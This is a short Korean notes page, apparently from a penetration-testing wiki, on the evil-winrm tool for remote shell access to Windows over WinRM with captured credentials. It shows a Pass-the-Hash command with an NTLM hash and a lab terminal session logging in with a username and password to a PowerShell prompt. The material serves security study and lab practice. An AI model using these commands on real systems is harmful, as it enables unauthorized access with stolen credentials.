evil-winrm

1. 개요

Windows 운영체제의 크리덴셜을 확보한 경우에 linux 에서 Windows 에 원격으로 접속(CLI) 해서 명령을 내릴 수 있게 하는 도구.

Microsoft 에서 시스템 관리자가 원격에서 서버를 관리하라고 만든 정상적인 기능(port 5985, 5986)에 대한 서비스이다. 하지만 해커들에게 공격 편의용으로 사용되고 있다. 다만, WMI 서비스가 작동중이며 5985번 포트가 개방일 때 사용이 가능한 점을 염두해야 한다.

1.1. 주요 기능

  1. 쉘 접속

  2. Pass-The-Hash

    evil-winrm -i 10.10.10.175 -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff

  3. 파일 업/다운로드

2. 사용법

2.1. 일반적인 크리덴셜을 이용한 접근

접근하고자 하는 Windows 의 계정의 아이디와 비밀번호를 획득한 경우 아래오 같이 접속할 수 있다.

┌──(root㉿kali)-[/home/kali/labs/sauna]
└─# evil-winrm -i 10.129.33.94 -u fsmith -p 'Thestrokes23'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>

2.2. 인증서를 통한 접근

Updated on
DCSync
Get-MSOLCredentials.ps1